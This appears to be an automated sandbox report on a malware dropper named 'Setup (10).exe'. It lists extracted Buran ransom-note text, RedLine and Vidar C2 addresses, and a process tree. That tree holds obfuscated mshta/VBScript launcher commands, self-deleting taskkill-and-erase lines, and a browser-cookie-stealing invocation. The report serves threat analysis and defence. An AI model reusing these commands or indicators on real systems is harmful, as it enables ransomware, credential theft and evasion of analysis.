Resubmissions

11-03-2024 21:22

240311-z8dsssgg58 10

01-09-2021 13:18

210901-5bmxjspa5s 10

01-09-2021 13:04

210901-te4btfspqa 10

01-09-2021 05:12

210901-4wnkwm1p3j 10

31-08-2021 21:47

210831-41rp97dma2 10

31-08-2021 19:51

210831-359awwatje 10

29-08-2021 11:37

210829-18htk4slyj 10

28-08-2021 23:10

210828-rt8b9gzxn6 10

28-08-2021 22:59

210828-zxgnh5j4w6 10

28-08-2021 11:31

210828-xrjs66aknj 10

Analysis

  • max time kernel
    921s
  • max time network
    1806s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    24-08-2021 20:54

General

  • Target

    Setup (10).exe

  • Size

    631KB

  • MD5

    cb927513ff8ebff4dd52a47f7e42f934

  • SHA1

    0de47c02a8adc4940a6c18621b4e4a619641d029

  • SHA256

    fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f

  • SHA512

    988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c

Malware Config

Extracted

Path

C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT

Family

buran

Ransom Note
!!! ALL YOUR FILES ARE ENCRYPTED !!! All your files, documents, photos, databases and other important files are encrypted. You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key. Only we can give you this key and only we can recover your files. PAY FAST 500$=0.013 btc or the price will increase tomorrow bitcoin address bc1qqxnp9z0ff8x852dyflp5r9r6rzse8jl5hzmqz8 To be sure we have the decryptor and it works you can send an email: payfast290@mail2tor.com and decrypt one file for free. But this file should be of not valuable! Do you really want to restore your files? payfast290@mail2tor.com TELEGRAM @ payfast290 Your personal ID: 29E-80A-410 Attention! * Do not rename encrypted files. * Do not try to decrypt your data using third party software, it may cause permanent data loss. * Decryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam.

Extracted

Family

redline

Botnet

supertraff

C2

135.148.139.222:1494

Extracted

Family

redline

Botnet

24.08

C2

95.181.172.100:55640

Extracted

Family

redline

Botnet

dibild2

C2

135.148.139.222:1494

Extracted

Family

vidar

Version

40.1

Botnet

937

C2

https://eduarroma.tumblr.com/

Attributes
  • profile_id

    937

Signatures

  • Buran

    Ransomware-as-a-service based on the VegaLocker family first identified in 2019.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • NetSupport

    NetSupport is a remote access tool sold as a legitimate system administration software.

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 6 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • SystemBC

    SystemBC is a proxy and remote administration tool first seen in 2019.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 31 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 4 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 24 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 12 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 19 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 25 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 32 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 58 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 48 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 8 IoCs
  • Modifies Internet Explorer settings 1 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 13 IoCs
  • Runs ping.exe 1 TTPs 3 IoCs
  • Script User-Agent 32 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious behavior: SetClipboardViewer 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SetWindowsHookEx 11 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    1⤵
      PID:2432
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
      • Suspicious use of SetThreadContext
      PID:2852
      • C:\Windows\system32\svchost.exe
        C:\Windows\system32\svchost.exe -k SystemNetworkService
        2⤵
        • Drops file in System32 directory
        • Checks processor information in registry
        • Modifies data under HKEY_USERS
        • Modifies registry class
        PID:5024
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s WpnService
      1⤵
        PID:2740
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
        1⤵
          PID:2724
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2424
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
            1⤵
              PID:1820
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s SENS
              1⤵
                PID:1404
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                1⤵
                  PID:1224
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s Themes
                  1⤵
                    PID:1184
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                    1⤵
                      PID:1064
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      • Drops file in Windows directory
                      PID:676
                      • C:\ProgramData\mebpn\lgsq.exe
                        C:\ProgramData\mebpn\lgsq.exe start
                        2⤵
                          PID:3860
                      • c:\windows\system32\svchost.exe
                        c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                        1⤵
                          PID:68
                        • C:\Users\Admin\AppData\Local\Temp\Setup (10).exe
                          "C:\Users\Admin\AppData\Local\Temp\Setup (10).exe"
                          1⤵
                          • Checks computer location settings
                          • Modifies system certificate store
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:3924
                          • C:\Users\Admin\Documents\__SOWA8tRrakx_qXeUAW5YTt.exe
                            "C:\Users\Admin\Documents\__SOWA8tRrakx_qXeUAW5YTt.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:412
                          • C:\Users\Admin\Documents\6uJ7kDGY2mN0_z_INHtbrw8d.exe
                            "C:\Users\Admin\Documents\6uJ7kDGY2mN0_z_INHtbrw8d.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:3576
                            • C:\Users\Admin\Documents\6uJ7kDGY2mN0_z_INHtbrw8d.exe
                              "C:\Users\Admin\Documents\6uJ7kDGY2mN0_z_INHtbrw8d.exe"
                              3⤵
                              • Executes dropped EXE
                              • Checks SCSI registry key(s)
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious behavior: MapViewOfSection
                              PID:5188
                          • C:\Users\Admin\Documents\DqHQhSf76S1DwAJggqUuyvUs.exe
                            "C:\Users\Admin\Documents\DqHQhSf76S1DwAJggqUuyvUs.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:3996
                            • C:\Users\Admin\AppData\Roaming\1421019.exe
                              "C:\Users\Admin\AppData\Roaming\1421019.exe"
                              3⤵
                              • Executes dropped EXE
                              • Adds Run key to start application
                              PID:4120
                              • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                4⤵
                                • Executes dropped EXE
                                PID:2168
                            • C:\Users\Admin\AppData\Roaming\2232024.exe
                              "C:\Users\Admin\AppData\Roaming\2232024.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4192
                            • C:\Users\Admin\AppData\Roaming\3375417.exe
                              "C:\Users\Admin\AppData\Roaming\3375417.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3832
                            • C:\Users\Admin\AppData\Roaming\2615992.exe
                              "C:\Users\Admin\AppData\Roaming\2615992.exe"
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:4664
                          • C:\Users\Admin\Documents\QRjcRUt_w465BpaM0CsIXsNh.exe
                            "C:\Users\Admin\Documents\QRjcRUt_w465BpaM0CsIXsNh.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:3932
                            • C:\Users\Admin\Documents\QRjcRUt_w465BpaM0CsIXsNh.exe
                              C:\Users\Admin\Documents\QRjcRUt_w465BpaM0CsIXsNh.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:612
                          • C:\Users\Admin\Documents\vl8ieEveenrrk0ATyyXk_6d6.exe
                            "C:\Users\Admin\Documents\vl8ieEveenrrk0ATyyXk_6d6.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of AdjustPrivilegeToken
                            PID:2500
                          • C:\Users\Admin\Documents\4lVrwSQJPodX2rnYzLcsEb21.exe
                            "C:\Users\Admin\Documents\4lVrwSQJPodX2rnYzLcsEb21.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:2920
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 388
                              3⤵
                              • Program crash
                              PID:5980
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 356
                              3⤵
                              • Program crash
                              PID:5360
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 404
                              3⤵
                              • Program crash
                              PID:5960
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 632
                              3⤵
                              • Program crash
                              PID:5484
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 660
                              3⤵
                              • Program crash
                              PID:2188
                            • C:\Windows\SysWOW64\WerFault.exe
                              C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 696
                              3⤵
                              • Program crash
                              PID:6260
                          • C:\Users\Admin\Documents\GaVhK5YC1oaMzKil_uB4Ubt7.exe
                            "C:\Users\Admin\Documents\GaVhK5YC1oaMzKil_uB4Ubt7.exe"
                            2⤵
                            • Executes dropped EXE
                            PID:4004
                            • C:\Users\Admin\Documents\GaVhK5YC1oaMzKil_uB4Ubt7.exe
                              "C:\Users\Admin\Documents\GaVhK5YC1oaMzKil_uB4Ubt7.exe" -q
                              3⤵
                              • Executes dropped EXE
                              PID:5048
                          • C:\Users\Admin\Documents\J0kuIvOhl8M2pMO7SzEbsSo1.exe
                            "C:\Users\Admin\Documents\J0kuIvOhl8M2pMO7SzEbsSo1.exe"
                            2⤵
                            • Executes dropped EXE
                            • Checks BIOS information in registry
                            • Checks whether UAC is enabled
                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1108
                          • C:\Users\Admin\Documents\yuk0VhsSo0mmBzasaZqb1qXc.exe
                            "C:\Users\Admin\Documents\yuk0VhsSo0mmBzasaZqb1qXc.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            PID:1344
                          • C:\Users\Admin\Documents\j88HxV4UXDWOPXhwPUiI12WW.exe
                            "C:\Users\Admin\Documents\j88HxV4UXDWOPXhwPUiI12WW.exe"
                            2⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:4048
                            • C:\Users\Admin\Documents\j88HxV4UXDWOPXhwPUiI12WW.exe
                              C:\Users\Admin\Documents\j88HxV4UXDWOPXhwPUiI12WW.exe
                              3⤵
                              • Executes dropped EXE
                              • Suspicious use of AdjustPrivilegeToken
                              PID:5100
                            • C:\Windows\System32\Conhost.exe
                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              3⤵
                              • Executes dropped EXE
                              • Loads dropped DLL
                              PID:2116
                          • C:\Users\Admin\Documents\Eig0VZhpDN6lNmaq8hdSLo8o.exe
                            "C:\Users\Admin\Documents\Eig0VZhpDN6lNmaq8hdSLo8o.exe"
                            2⤵
                              PID:3960
                              • C:\Users\Admin\Documents\Eig0VZhpDN6lNmaq8hdSLo8o.exe
                                "C:\Users\Admin\Documents\Eig0VZhpDN6lNmaq8hdSLo8o.exe"
                                3⤵
                                  PID:4756
                              • C:\Users\Admin\Documents\uirJhyYUCrI_qlr8NOzHWiKx.exe
                                "C:\Users\Admin\Documents\uirJhyYUCrI_qlr8NOzHWiKx.exe"
                                2⤵
                                • Executes dropped EXE
                                • Loads dropped DLL
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3768
                              • C:\Users\Admin\Documents\KEwv8xFLso1JmhjHqpiKMOP4.exe
                                "C:\Users\Admin\Documents\KEwv8xFLso1JmhjHqpiKMOP4.exe"
                                2⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3692
                              • C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe
                                "C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe"
                                2⤵
                                  PID:192
                                  • C:\Windows\SysWOW64\mshta.exe
                                    "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                    3⤵
                                      PID:4568
                                      • C:\Windows\SysWOW64\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "" =="" for %W iN ( "C:\Users\Admin\Documents\ecDLy1NDbln6v7JVsQfvOgI7.exe" ) do taskkill -IM "%~nXW" -f
                                        4⤵
                                          PID:4292
                                          • C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe
                                            WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9
                                            5⤵
                                            • Executes dropped EXE
                                            PID:4232
                                            • C:\Windows\SysWOW64\mshta.exe
                                              "C:\Windows\System32\mshta.exe" vbSCRipt: ClOSe( creATEoBJEcT ( "WscRIpT.sHEll" ). RUN ( "Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 , TRUE ) )
                                              6⤵
                                                PID:1512
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  "C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 " =="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" ) do taskkill -IM "%~nXW" -f
                                                  7⤵
                                                  • Suspicious behavior: EnumeratesProcesses
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:900
                                              • C:\Windows\SysWOW64\rundll32.exe
                                                "C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE
                                                6⤵
                                                • Loads dropped DLL
                                                PID:6008
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill -IM "ecDLy1NDbln6v7JVsQfvOgI7.exe" -f
                                              5⤵
                                              • Kills process with taskkill
                                              PID:4736
                                      • C:\Users\Admin\Documents\kDaXHvvZVGDJV9I0suMAnWms.exe
                                        "C:\Users\Admin\Documents\kDaXHvvZVGDJV9I0suMAnWms.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        • Checks BIOS information in registry
                                        • Checks whether UAC is enabled
                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:420
                                      • C:\Users\Admin\Documents\eqfQXlwEgqjk3uuKF7no3C7p.exe
                                        "C:\Users\Admin\Documents\eqfQXlwEgqjk3uuKF7no3C7p.exe"
                                        2⤵
                                        • Executes dropped EXE
                                        PID:3224
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "eqfQXlwEgqjk3uuKF7no3C7p.exe" /f & erase "C:\Users\Admin\Documents\eqfQXlwEgqjk3uuKF7no3C7p.exe" & exit
                                          3⤵
                                            PID:3180
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im "eqfQXlwEgqjk3uuKF7no3C7p.exe" /f
                                              4⤵
                                              • Executes dropped EXE
                                              • Suspicious use of SetThreadContext
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3960
                                        • C:\Users\Admin\Documents\UGu9wlp0dLoN9BlhkUBwUwpp.exe
                                          "C:\Users\Admin\Documents\UGu9wlp0dLoN9BlhkUBwUwpp.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1864
                                        • C:\Users\Admin\Documents\DYjacoNBWHXBSpX1yI4OpEUs.exe
                                          "C:\Users\Admin\Documents\DYjacoNBWHXBSpX1yI4OpEUs.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:2352
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 760
                                            3⤵
                                            • Program crash
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5508
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 812
                                            3⤵
                                            • Program crash
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5760
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 780
                                            3⤵
                                            • Program crash
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6012
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 952
                                            3⤵
                                            • Program crash
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5980
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 824
                                            3⤵
                                            • Program crash
                                            PID:6040
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1004
                                            3⤵
                                            • Program crash
                                            PID:3532
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1072
                                            3⤵
                                            • Program crash
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:6040
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1360
                                            3⤵
                                            • Program crash
                                            PID:4376
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1448
                                            3⤵
                                            • Program crash
                                            PID:4464
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1552
                                            3⤵
                                            • Program crash
                                            PID:7008
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1644
                                            3⤵
                                            • Program crash
                                            PID:7300
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 1356
                                            3⤵
                                            • Program crash
                                            PID:7976
                                        • C:\Users\Admin\Documents\S2adwB8YQHI5nIMuEbZ1PpBl.exe
                                          "C:\Users\Admin\Documents\S2adwB8YQHI5nIMuEbZ1PpBl.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:2732
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2732 -s 480
                                            3⤵
                                            • Suspicious use of NtCreateProcessExOtherParentProcess
                                            • Program crash
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:5540
                                        • C:\Users\Admin\Documents\v1FwtFtx7XWd4dMYIyla_VJ1.exe
                                          "C:\Users\Admin\Documents\v1FwtFtx7XWd4dMYIyla_VJ1.exe"
                                          2⤵
                                          • Executes dropped EXE
                                          PID:2748
                                          • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                            "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Checks whether UAC is enabled
                                            PID:4416
                                          • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                            "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            PID:4472
                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                              • Executes dropped EXE
                                              PID:3584
                                          • C:\Program Files (x86)\Company\NewProduct\customer3.exe
                                            "C:\Program Files (x86)\Company\NewProduct\customer3.exe"
                                            3⤵
                                            • Executes dropped EXE
                                            • Drops startup file
                                            PID:4380
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                              4⤵
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:4736
                                            • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                              C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                              4⤵
                                                PID:5380
                                          • C:\Users\Admin\Documents\vTUTBKxGdlQ0CJyNdqOMyuj4.exe
                                            "C:\Users\Admin\Documents\vTUTBKxGdlQ0CJyNdqOMyuj4.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            • Checks BIOS information in registry
                                            • Checks whether UAC is enabled
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2464
                                          • C:\Users\Admin\Documents\YXUTGj1rbqe7ZaihyRKcm_e3.exe
                                            "C:\Users\Admin\Documents\YXUTGj1rbqe7ZaihyRKcm_e3.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:3944
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 660
                                              3⤵
                                              • Program crash
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3016
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 676
                                              3⤵
                                              • Program crash
                                              PID:900
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 632
                                              3⤵
                                              • Program crash
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3392
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 660
                                              3⤵
                                              • Program crash
                                              PID:5348
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -u -p 3944 -s 1056
                                              3⤵
                                              • Suspicious use of NtCreateProcessExOtherParentProcess
                                              • Program crash
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:5724
                                          • C:\Users\Admin\Documents\zCh4Tv7wEG0G9HMSy90L0Gif.exe
                                            "C:\Users\Admin\Documents\zCh4Tv7wEG0G9HMSy90L0Gif.exe"
                                            2⤵
                                            • Executes dropped EXE
                                            PID:2344
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\5759457036.exe"
                                              3⤵
                                                PID:6072
                                                • C:\Users\Admin\AppData\Local\Temp\5759457036.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\5759457036.exe"
                                                  4⤵
                                                  • Executes dropped EXE
                                                  • Drops file in Windows directory
                                                  PID:4996
                                              • C:\Windows\SysWOW64\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c start /I "" "C:\Users\Admin\AppData\Local\Temp\3677823237.exe"
                                                3⤵
                                                  PID:7440
                                                  • C:\Users\Admin\AppData\Local\Temp\3677823237.exe
                                                    "C:\Users\Admin\AppData\Local\Temp\3677823237.exe"
                                                    4⤵
                                                      PID:4656
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 744
                                                        5⤵
                                                        • Program crash
                                                        PID:7404
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 760
                                                        5⤵
                                                        • Program crash
                                                        PID:8364
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 724
                                                        5⤵
                                                        • Program crash
                                                        PID:8796
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c taskkill /im "zCh4Tv7wEG0G9HMSy90L0Gif.exe" /f & erase "C:\Users\Admin\Documents\zCh4Tv7wEG0G9HMSy90L0Gif.exe" & exit
                                                    3⤵
                                                      PID:4092
                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                        taskkill /im "zCh4Tv7wEG0G9HMSy90L0Gif.exe" /f
                                                        4⤵
                                                        • Kills process with taskkill
                                                        PID:6024
                                                  • C:\Users\Admin\Documents\Wr0qtdKR68nAMIsvlNReNhUZ.exe
                                                    "C:\Users\Admin\Documents\Wr0qtdKR68nAMIsvlNReNhUZ.exe"
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:4332
                                                • C:\Users\Admin\AppData\Local\Temp\is-9DR10.tmp\Wr0qtdKR68nAMIsvlNReNhUZ.tmp
